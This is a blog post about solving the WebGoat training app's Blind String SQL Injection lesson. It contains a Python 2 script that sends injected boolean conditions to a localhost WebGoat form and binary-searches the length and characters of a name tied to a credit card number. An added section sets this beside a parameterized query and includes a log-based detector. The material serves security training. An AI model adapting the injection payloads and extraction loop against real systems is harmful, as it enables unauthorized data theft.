
Solving WebGoat's Blind String SQL Injection with a Python program

2013-03-08 16:54
This task is fairly tedious to attempt by hand, so I decided to solve it with a program.

Python is convenient for this kind of task, so I spent some time getting started with Python and then began writing code; the underlying idea is very simple.

In the process I found I had gotten rusty even on simple algorithms. Embarrassing.

The code follows.
#!/usr/bin/python
# author: dengzhaoqun
# date: 2013-03-08
# email: dengzhaoqun@163.com
# Python 2 script (urllib2, print statement) aimed at the local WebGoat lesson.

import urllib
import urllib2

url = 'http://localhost/WebGoat/attack?Screen=3433&menu=1100'
account = 101
result = '<p>Account number is valid</form></div>'

def isValid(payload):
    # Submit the form and report whether the page says the account is valid.
    # That single true/false answer is the oracle the blind injection relies on.
    params = urllib.urlencode({'account_number': payload, 'SUBMIT': 'Go!'})
    req = urllib2.Request(url, params, {'Cookie': 'JSESSIONID=8FFA3190C91029D2BB486DEBE4D037B0'})
    content = urllib2.urlopen(req).read()
    return content.find(result) != -1

# Step 1: binary-search the length of the name (assumed to be at most 100).
lenMax = 100
lenMin = 1

while lenMax > lenMin:
    mid = (lenMax + lenMin) / 2   # integer division in Python 2
    payload = "%d and ((LENGTH(select name from pins where cc_number = '4321432143214321')) <= %d)" % (account, mid)
    if not isValid(payload):
        lenMin = mid + 1          # the name is longer than mid
    else:
        lenMax = mid              # the name is at most mid characters

print "--- name len: %d ---" % lenMax

# Step 2: binary-search each character over the range 'A' (65) .. 'z' (122).
name = ''
for i in range(1, lenMax + 1):
    charMax = 122  # 'z'
    charMin = 65   # 'A'
    while charMax > charMin:
        mid = (charMax + charMin) / 2
        payload = "%d and ((SUBSTRING((select name from pins where cc_number = '4321432143214321'), %d, 1)) <= '%s')" % (account, i, chr(mid))
        if not isValid(payload):
            charMin = mid + 1     # the character sorts after chr(mid)
        else:
            charMax = mid         # the character is at most chr(mid)
    name += chr(charMax)

print '--- name: %s ---' % name
Running it gives:
--- name len: 4 ---
--- name: Jill ---
"Jill" is the name we were looking for.
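As an added example (not code from the post or from WebGoat), the Python 3 snippet below shows why the boolean oracle exists and how to close it. It puts the lesson's pattern, concatenating the form value into the query text, beside a validated, parameterized version, runs both against an in-memory SQLite copy of the two tables with constructed rows, and the `oracle_leaks` check submits the post's length condition once true and once false to see whether the answers differ. A small log check then flags sessions that keep sending non-numeric account numbers, which is the footprint a script like the one above leaves. The schema, table contents, log format and session ids are assumptions made for this example; the real lesson runs on HSQLDB, so the scalar subquery carries the extra parentheses SQLite requires.

```python
import re
import sqlite3

# Constructed sample data in the shape of the lesson's tables (an assumption,
# not WebGoat's real schema).
SCHEMA = """
CREATE TABLE user_data (userid INTEGER, first_name TEXT);
CREATE TABLE pins (cc_number TEXT, name TEXT);
INSERT INTO user_data VALUES (101, 'Joe');
INSERT INTO pins VALUES ('4321432143214321', 'Jill');
"""


def new_db():
    """Fresh in-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def account_is_valid_vulnerable(conn, account_number):
    """The lesson's pattern: the form value is concatenated into the SQL text."""
    sql = "SELECT * FROM user_data WHERE userid = " + account_number
    return conn.execute(sql).fetchone() is not None


def account_is_valid_hardened(conn, account_number):
    """Check the type first, then bind a parameter; the value is never parsed as SQL."""
    if not account_number.isdigit():
        return False
    sql = "SELECT * FROM user_data WHERE userid = ?"
    return conn.execute(sql, (int(account_number),)).fetchone() is not None


# The post's length condition, with the extra parentheses SQLite needs around
# a scalar subquery (the lesson itself runs on HSQLDB).
LENGTH_CONDITION = (
    "101 and ((LENGTH((SELECT name FROM pins "
    "WHERE cc_number = '4321432143214321'))) <= %d)"
)


def oracle_leaks(check):
    """True when a true and a false condition yield different answers, i.e.
    the endpoint can serve as the boolean oracle the binary search needs."""
    conn = new_db()
    answer_true = check(conn, LENGTH_CONDITION % 10)   # 'Jill' has 4 chars: true
    answer_false = check(conn, LENGTH_CONDITION % 2)   # 4 <= 2 is false
    return answer_true != answer_false


# Constructed request-log lines (session id, submitted account_number). The
# blind script issues a burst of such posts, all carrying non-numeric values.
SAMPLE_LOG = [
    "sess=A1 account_number=101",
    "sess=A1 account_number=" + LENGTH_CONDITION % 50,
    "sess=A1 account_number=" + LENGTH_CONDITION % 25,
    "sess=A1 account_number=" + LENGTH_CONDITION % 12,
    "sess=A1 account_number=" + LENGTH_CONDITION % 6,
    "sess=B2 account_number=102",
    "sess=B2 account_number=10a",
]

LOG_RE = re.compile(r"^sess=(\S+) account_number=(.*)$")


def suspicious_sessions(log_lines, threshold=3):
    """Sessions that submitted a non-numeric account_number at least `threshold` times."""
    counts = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        sess, value = m.group(1), m.group(2).strip()
        if not value.isdigit():
            counts[sess] = counts.get(sess, 0) + 1
    return {s: n for s, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print("concatenated query leaks:", oracle_leaks(account_is_valid_vulnerable))
    print("parameterized query leaks:", oracle_leaks(account_is_valid_hardened))
    print("suspicious sessions:", suspicious_sessions(SAMPLE_LOG))
```

The hardened version answers "invalid" for both probes, so the binary search has nothing to bisect on. On the detection side, the search over at most 100 lengths costs about 7 requests and each character in the 'A'..'z' range about 6 more, so even a four-letter name means roughly 30 malformed posts from one session within seconds, which is what the per-session threshold is meant to catch.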